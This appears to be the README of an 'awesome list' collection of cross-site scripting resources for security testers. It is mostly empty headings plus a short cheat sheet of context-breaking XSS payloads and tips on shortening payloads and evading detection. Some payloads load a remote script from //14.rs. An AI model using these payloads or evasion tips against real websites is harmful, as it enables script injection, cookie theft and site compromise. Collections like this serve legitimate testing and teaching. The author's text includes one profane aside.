AwesomeXSS
Awesome XSS stuff. Put this repo on watch. I will be updating it regularly.
Awesome Books
Awesome Websites
Awesome People
- Rodolfo Assis
- Ashar Javed
- Somdev Sangwan I own this repo, I can write whatever the fuck I want :v
Awesome Reads
Awesome Presentations
- How I met your girlfriend
- How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour
- Blind XSS
- Copy Pest
Awesome Context Breaking
Simple Context
<svg onload=alert()>
</tag><svg onload=alert()>
Attribute Context
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
JavaScript Context
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
Awesome Payloads
Come back later
Awesome Exploits
Come back later
Awesome Tags & Event Handlers
Come back later
Awesome Methodology
Come back later
Awesome Tools
Awesome Tips & Tricks
- http:// can be shortened to //
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert(1) and start doing alert()
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around attribute value aren't necessary. You can use <script src=//14.rs> instead of <script src="//14.rs">
- The shortest independent payload is <embed src=//14.rs> (19 chars)
Credits and all that
All the payloads are crafted by me unless specified. Thanks to my big brother Rodolfo Assis whose writings inspired me to become an XSSLord.